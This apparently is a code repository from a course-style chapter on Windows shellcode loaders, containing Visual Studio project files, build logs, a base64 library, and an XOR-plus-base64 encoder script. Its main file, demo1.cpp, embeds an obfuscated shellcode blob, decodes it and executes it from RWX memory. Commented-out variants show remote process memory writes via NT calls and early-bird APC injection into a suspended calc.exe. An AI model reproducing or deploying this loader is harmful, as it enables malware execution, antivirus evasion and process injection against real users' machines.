</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="base64.cpp" />
<ClCompile Include="demo1.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="base64.h" />
<ClInclude Include="Header.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: chapter4-demo1/demo1/demo1.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Resource Files\Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="demo1.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="base64.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Header.h">
<Filter>Resource Files</Filter>
</ClInclude>
<ClInclude Include="base64.h">
<Filter>Resource Files\Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>
================================================
FILE: chapter4-demo1/demo1/demo1.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: chapter4-demo1/demo1/x64/Debug/demo1.exe.recipe
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>C:\Users\Admin\Desktop\demo1\x64\Debug\demo1.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>
================================================
FILE: chapter4-demo1/demo1/x64/Debug/demo1.log
================================================
base64.cpp
demo1.cpp
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(33,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(38,16): warning C4018: “<”: 有符号/无符号不匹配
正在生成代码...
demo1.vcxproj -> C:\Users\Admin\Desktop\demo1\x64\Debug\demo1.exe
================================================
FILE: chapter4-demo1/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate
================================================
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:
Debug|x64|C:\Users\Admin\Desktop\demo1\|
================================================
FILE: chapter4-demo1/demo1/x64/Release/demo1.exe.recipe
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project>
<ProjectOutputs>
<ProjectOutput>
<FullPath>C:\Users\Admin\Desktop\demo1\x64\Release\demo1.exe</FullPath>
</ProjectOutput>
</ProjectOutputs>
<ContentFiles />
<SatelliteDlls />
<NonRecipeFileRefs />
</Project>
================================================
FILE: chapter4-demo1/demo1/x64/Release/demo1.log
================================================
base64.cpp
demo1.cpp
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(33,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”,可能丢失数据
C:\Users\Admin\Desktop\demo1\demo1\demo1.cpp(38,16): warning C4018: “<”: 有符号/无符号不匹配
正在生成代码
Previous IPDB not found, fall back to full compilation.
All 132 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
已完成代码的生成
demo1.vcxproj -> C:\Users\Admin\Desktop\demo1\x64\Release\demo1.exe
================================================
FILE: chapter4-demo1/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate
================================================
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:
Release|x64|C:\Users\Admin\Desktop\demo1\|
================================================
FILE: chapter4-demo1/demo1.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.28729.10
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "demo1", "demo1\demo1.vcxproj", "{1876F365-2DEC-42C9-B80E-B631B26FCAD8}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.ActiveCfg = Debug|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.Build.0 = Debug|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.ActiveCfg = Debug|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.Build.0 = Debug|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.ActiveCfg = Release|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.Build.0 = Release|x64
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.ActiveCfg = Release|Win32
{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {1F8E67EA-F3B7-42DD-84B6-2CD2AC0305B7}
EndGlobalSection
EndGlobal
================================================
FILE: chapter4-demo1/enc.py
================================================
import base64
with open("1.txt","rb") as f:
all=f.read()
array=[]
for i in all:
array.append(i^8)
#print(bytearray(array))
print(base64.b64encode(bytearray(array)))
================================================
FILE: chapter4-demo2/demo1/Debug/demo1.log
================================================
demo1.vcxproj -> E:\7bits_demo\demo1\demo1\Debug\demo1.exe
================================================
FILE: chapter4-demo2/demo1/Debug/demo1.tlog/demo1.lastbuildstate
================================================
#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0
Debug|Win32|E:\7bits_demo\demo1\demo1\|
================================================
FILE: chapter4-demo2/demo1/Header.h
================================================
#pragma once
const int XOR_KEY{ 8 };
#include <vector>
const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
(void*)0x0000000010000000,
(void*)0x0000000021000000,
(void*)0x0000000032000000,
(void*)0x0000000043000000,
(void*)0x0000000050000000,
(void*)0x0000000041000000,
(void*)0x0000000042000000,
(void*)0x0000000040000000,
(void*)0x0000000022000000 };
================================================
FILE: chapter4-demo2/demo1/base64.cpp
================================================
/*
base64.cpp and base64.h
base64 encoding and decoding with C++.
More information at
https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp
Version: 2.rc.08 (release candidate)
Copyright (C) 2004-2017, 2020, 2021 Ren?Nyffenegger
This source code is provided 'as-is', without any express or implied
warranty. In no event will the author be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this source code must not be misrepresented; you must not
claim that you wrote the original source code. If you use this source code
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original source code.
3. This notice may not be removed or altered from any source distribution.
Ren?Nyffenegger rene.nyffenegger@adp-gmbh.ch
*/
#include "base64.h"
#include <algorithm>
#include <stdexcept>
//
// Depending on the url parameter in base64_chars, one of
// two sets of base64 characters needs to be chosen.
// They differ in their last two characters.
//
static const char* base64_chars[2] = {
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"+/",
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"-_" };
static unsigned int pos_of_char(const unsigned char chr) {
//
// Return the position of chr within base64_encode()
//
if (chr >= 'A' && chr <= 'Z') return chr - 'A';
else if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;
else if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;
else if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (
else if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'
else
//
// 2020-10-23: Throw std::exception rather than const char*
//(Pablo Martin-Gomez, https://github.com/Bouska)
//
throw std::runtime_error("Input is not valid base64-encoded data.");
}
static std::string insert_linebreaks(std::string str, size_t distance) {
//
// Provided by https://github.com/JomaCorpFX, adapted by me.
//
if (!str.length()) {
return "";
}
size_t pos = distance;
while (pos < str.size()) {
str.insert(pos, "\n");
pos += distance + 1;
}
return str;
}
template <typename String, unsigned int line_length>
static std::string encode_with_line_breaks(String s) {
return insert_linebreaks(base64_encode(s, false), line_length);
}
template <typename String>
static std::string encode_pem(String s) {
return encode_with_line_breaks<String, 64>(s);
}
template <typename String>
static std::string encode_mime(String s) {
return encode_with_line_breaks<String, 76>(s);
}
template <typename String>
static std::string encode(String s, bool url) {
return base64_encode(reinterpret_cast<const unsigned char*>(s.data()), s.length(), url);
}
std::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {
size_t len_encoded = (in_len + 2) / 3 * 4;
unsigned char trailing_char = url ? '.' : '=';
//
// Choose set of base64 characters. They differ
// for the last two positions, depending on the url
// parameter.
// A bool (as is the parameter url) is guaranteed
// to evaluate to either 0 or 1 in C++ therefore,
// the correct character set is chosen by subscripting
// base64_chars with url.
//
const char* base64_chars_ = base64_chars[url];
std::string ret;
ret.reserve(len_encoded);
unsigned int pos = 0;
while (pos < in_len) {
ret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);
if (pos + 1 < in_len) {
ret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);
if (pos + 2 < in_len) {
ret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);
ret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);
}
else {
ret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);
ret.push_back(trailing_char);
}
}
else {
ret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);
ret.push_back(trailing_char);
ret.push_back(trailing_char);
}
pos += 3;
}
return ret;
}
template <typename String>
static std::string decode(String encoded_string, bool remove_linebreaks) {
//
// decode(? is templated so that it can be used with String = const std::string&
// or std::string_view (requires at least C++17)
//
if (encoded_string.empty()) return std::string();
if (remove_linebreaks) {
std::string copy(encoded_string);
copy.erase(std::remove(copy.begin(), copy.end(), '\n'), copy.end());
return base64_decode(copy, false);
}
size_t length_of_string = encoded_string.length();
size_t pos = 0;
//
// The approximate length (bytes) of the decoded string might be one or
// two bytes smaller, depending on the amount of trailing equal signs
// in the encoded string. This approximation is needed to reserve
// enough space in the string to be returned.
//
size_t approx_length_of_decoded_string = length_of_string / 4 * 3;
std::string ret;
ret.reserve(approx_length_of_decoded_string);
while (pos < length_of_string) {
//
// Iterate over encoded input string in chunks. The size of all
// chunks except the last one is 4 bytes.
//
// The last chunk might be padded with equal signs or dots
// in order to make it 4 bytes in size as well, but this
// is not required as per RFC 2045.
//
// All chunks except the last one produce three output bytes.
//
// The last chunk produces at least one and up to three bytes.
//
size_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);
//
// Emit the first output byte that is produced in each chunk:
//
ret.push_back(static_cast<std::string::value_type>(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));
if ((pos + 2 < length_of_string) && // Check for data that is not padded with equal signs (which is allowed by RFC 2045)
encoded_string[pos + 2] != '=' &&
encoded_string[pos + 2] != '.' // accept URL-safe base 64 strings, too, so check for '.' also.
)
{
//
// Emit a chunk's second byte (which might not be produced in the last chunk).
//
unsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);
ret.push_back(static_cast<std::string::value_type>(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));
if ((pos + 3 < length_of_string) &&
encoded_string[pos + 3] != '=' &&
encoded_string[pos + 3] != '.'
)
{
//
// Emit a chunk's third byte (which might not be produced in the last chunk).
//
ret.push_back(static_cast<std::string::value_type>(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));
}
}
pos += 4;
}
return ret;
}
std::string base64_decode(std::string const& s, bool remove_linebreaks) {
return decode(s, remove_linebreaks);
}
std::string base64_encode(std::string const& s, bool url) {
return encode(s, url);
}
std::string base64_encode_pem(std::string const& s) {
return encode_pem(s);
}
std::string base64_encode_mime(std::string const& s) {
return encode_mime(s);
}
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
std::string base64_encode(std::string_view s, bool url) {
return encode(s, url);
}
std::string base64_encode_pem(std::string_view s) {
return encode_pem(s);
}
std::string base64_encode_mime(std::string_view s) {
return encode_mime(s);
}
std::string base64_decode(std::string_view s, bool remove_linebreaks) {
return decode(s, remove_linebreaks);
}
#endif // __cplusplus >= 201703L
================================================
FILE: chapter4-demo2/demo1/base64.h
================================================
//
// base64 encoding and decoding with C++.
// Version: 2.rc.08 (release candidate)
//
#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#include <string>
#if __cplusplus >= 201703L
#include <string_view>
#endif // __cplusplus >= 201703L
std::string base64_encode(std::string const& s, bool url = false);
std::string base64_encode_pem(std::string const& s);
std::string base64_encode_mime(std::string const& s);
std::string base64_decode(std::string const& s, bool remove_linebreaks = false);
std::string base64_encode(unsigned char const*, size_t len, bool url = false);
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
std::string base64_encode(std::string_view s, bool url = false);
std::string base64_encode_pem(std::string_view s);
std::string base64_encode_mime(std::string_view s);
std::string base64_decode(std::string_view s, bool remove_linebreaks = false);
#endif // __cplusplus >= 201703L
#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */
================================================
FILE: chapter4-demo2/demo1/demo1.cpp
================================================
// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <iostream>
#include <windows.h>
#include "header.h"
#include "base64.h"
#include "nt.h"
using namespace std;
unsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)
{
DWORD szRead{ 0 };
HANDLE hFile = CreateFileA(
fnamSc,
GENERIC_READ,
NULL,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (INVALID_HANDLE_VALUE == hFile)
return nullptr;
SIZE_T szFile = GetFileSize(hFile, NULL);
*szSc = szFile;
unsigned char* raw = new unsigned char[szFile];
unsigned char* sc = new unsigned char[szFile];
if (!ReadFile(hFile, raw, szFile, &szRead, NULL))
return nullptr;
int i;
for (i = 0; i < szRead; i++) {
sc[i] = raw[i] ^ XOR_KEY;
}
return sc;
}
std::string replace(const std::string& inStr, const char* pSrc, const char* pReplace)
{
std::string str = inStr;
std::string::size_type stStart = 0;
std::string::iterator iter = str.begin();
while (iter != str.end())
{
std::string::size_type st = str.find(pSrc, stStart);
if (st == str.npos)
{
break;
}
iter = iter + st - stStart;
str.replace(iter, iter + strlen(pSrc), pReplace);
iter = iter + strlen(pReplace);
stStart = st + strlen(pReplace);
}
return str;
}
LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
MEMORY_BASIC_INFORMATION mbi;
for (auto base : VC_PREF_BASES) {
VirtualQueryEx(
hProc,
base,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE == mbi.State) {
uint64_t i;
for (i = 0; i < cVmResv; ++i) {
LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
VirtualQueryEx(
hProc,
currentBase,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE != mbi.State)
break;
}
if (i == cVmResv) {
// found suitable base
return base;
}
}
}
return nullptr;
}
int main()
{
bool all_tests_passed = false;
std::string rest2_reference = "9ECL7PjgwAgICElZSVhaWV5AOdptQINaaECDWhBAg1ooQIN6WEAHv0JCRTnBQDnIpDRpdAokKEnJwQVJCcnq5VpJWUCDWiiDSjRACdhuiXAQAwp9eoOIgAgICECNyHxvQAnYWINAEEyDSChBCdjrXkD3wUmDPIBACd5FOcFAOcikScnBBUkJyTDofflEC0QsAE0x2X3QUEyDSCxBCdhuSYMEQEyDSBRBCdhJgwyAQAnYSVBJUFZRUklQSVFJUkCL5ChJWvfoUElRUkCDGuFH9/f3VWIIQbZ/YWZhZm18CEleQYHuRIH5SbJEfy4P991AOcFAOdpFOchFOcFJWElYSbIyXnGv993je1JAgclJsFgICAhFOcFJWUlZYgtJWUmyX4GXzvfd41FTQIHJQDnaQYHQRTnBWmAICkiMWlpJsuNdJjP33UCBzkCLy1hiAldAgflAgdJBz8j39/f3RTnBWlpJsiUOEHP33Y3IB42VCQgIQPfHB4yECQgI49vh7AkICOCq9/f3J0V8UEwIQShDvCCeEfnGqz4QOUCZb1k9zZRfrP2kaoTlwQZQ+aY4tgZwQlaNp0lYfmGOcGoGYzblJRLD9V4TH2y6c1s4iOAMlePMttdpgghde216JUlvbWZ8MihFZ3JhZGRpJzwmOCgga2dleGl8YWpkbTMoRVtBTSg/JjgzKF9hZmxnf3soRlwoPSY5IQUCCM1l6QoDmhAeJZoutN1CPkoMbBYRT4p4JodhVtQQ/QXiL7U61RfcwKRjFq95GITSknVDXEYydGh4NjiMRT6a43pevMz6zCoiQMDcYy/1jHjhWWvhVp/6TPSIiL5RP8LaSwpz++6FswyGtYnKUJ+da0rRw4YW4GE1isJ9yBukKGBzCetRpZrAZtf8AZPUpuLRg9gLYdXFeifw5yhKxN4jy6BQV14m/VHXb2WO3XrQXc7c0CxfgIM1rYMHGVMH6y9uyurrF7uMzIg+sptJ4pFTYuzDslBKxx4+qcw2ikCPTsks2vAe8rGqLYAwlP4+eRcISbb4vape991AOcGyCAhICEmwCBgICEmxSAgICEmyUKxb7ffdQJtbW0CB70CB+UCB0kmwCCgICEGB8UmyGp6B6vfdQIvMKI3IfL5ugw9ACcuNyH3fUFBQQA0ICAgIWMvgl/X39zkxOiY5PjAmOCY5OzkIWQG3ZQ@@";
std::string rest3_reference = replace(rest2_reference, "@@", "==");
std::string rest2_decoded = base64_decode(rest3_reference);
const char* S = rest2_decoded.c_str();
HANDLE hProc = OpenProcess(
PROCESS_ALL_ACCESS,
FALSE,
8236
);
SYSTEM_INFO sys_inf;
GetSystemInfo(&sys_inf);
DWORD page_size{ sys_inf.dwPageSize };
DWORD alloc_gran{ sys_inf.dwAllocationGranularity };
SIZE_T szVmResv{ alloc_gran };
SIZE_T szVmCmm{ page_size };
DWORD cVmResv = (rest2_decoded.length() / szVmResv) + 1;
DWORD cVmCmm = szVmResv / szVmCmm;
LPVOID vmBaseAddress = GetSuitableBaseAddress(
hProc,
szVmCmm,
szVmResv,
cVmResv
);
LPVOID currentVmBase{ vmBaseAddress };
NTSTATUS status{ 0 };
vector<LPVOID> vcVmResv;
//alloc memeory
for (int i = 1; i <= cVmResv; ++i)
{
status = BNtAVM(
hProc,
¤tVmBase,
NULL,
&szVmResv,
MEM_RESERVE,
PAGE_NOACCESS
);
if (STATUS_SUCCESS == status) {
vcVmResv.push_back(currentVmBase);
}
else {
std::cout << "AVM error";
}
currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
}
DWORD offsetSc{ 0 };
DWORD oldProt;
double prcDone{ 0 };
DWORD cmm_i;
for (int i = 0; i < cVmResv; ++i)
{
unsigned char* sc = new unsigned char[szVmCmm];
for (int j = 0; j < szVmCmm; j++) {
//cout << szVmCmm * i + j << endl;
sc[j] = S[szVmCmm * i + j] ^ XOR_KEY;
}
void* exec = VirtualAlloc(0, cVmResv, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, sc, rest2_decoded.length());
((void(*)())exec)();
/*
for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i)
{
DWORD offset = (cmm_i * szVmCmm);
currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);
status = BNtAVM(
hProc,
¤tVmBase,
NULL,
&szVmCmm,
MEM_COMMIT,
PAGE_READWRITE
);
SIZE_T szWritten{ 0 };
status = BNtWVM(
hProc,
currentVmBase,
&sc[offset],
szVmCmm,
&szWritten
);
offsetSc += szVmCmm;
status = BNtPVM(
hProc,
¤tVmBase,
&szVmCmm,
PAGE_EXECUTE_READ,
&oldProt
);
}*/
}
/*
for (int i = 0; i < rest2_decoded.length(); i++) {
sc[i] = S[i] ^ 8;
}
for (int i=0; i < rest2_decoded.length(); i++) {
sc_rev[i] = sc[rest2_decoded.length() - i-1];
}*/
/*
void * exec = VirtualAlloc(0, rest2_decoded.length(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, sc_rev, rest2_decoded.length());
//unsigned const char* S=
((void(*)())exec)();
*/
/*
CreateThread
HANDLE hThread = CreateThread(
NULL,
0,
(LPTHREAD_START_ROUTINE)exec,
NULL,
0,
NULL);
if (hThread == NULL)
{
return 1;
}
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
*/
/*
eariler bird APC
SIZE_T shellSize = szSc;
STARTUPINFOA si = { 0 };
PROCESS_INFORMATION pi = { 0 };
CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
HANDLE victimProcess = pi.hProcess;
HANDLE threadHandle = pi.hThread;
LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
WriteProcessMemory(victimProcess, shellAddress, S, shellSize, NULL);
QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
ResumeThread(threadHandle);
*/
}
// Run program: Ctrl + F5 or Debug > Start Without Debugging menu
// Debug program: F5 or Debug > Start Debugging menu
// Tips for Getting Started:
// 1. Use the Solution Explorer window to add/manage files
// 2. Use the Team Explorer window to connect to source control
// 3. Use the Output window to see build output and other messages
// 4. Use the Error List window to view errors
// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
// 6. In the future, to open this project again, go to File > Open > Project and select the .sln file
================================================
FILE: chapter4-demo2/demo1/demo1.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{1876F365-2DEC-42C9-B80E-B631B26FCAD8}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>demo1</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
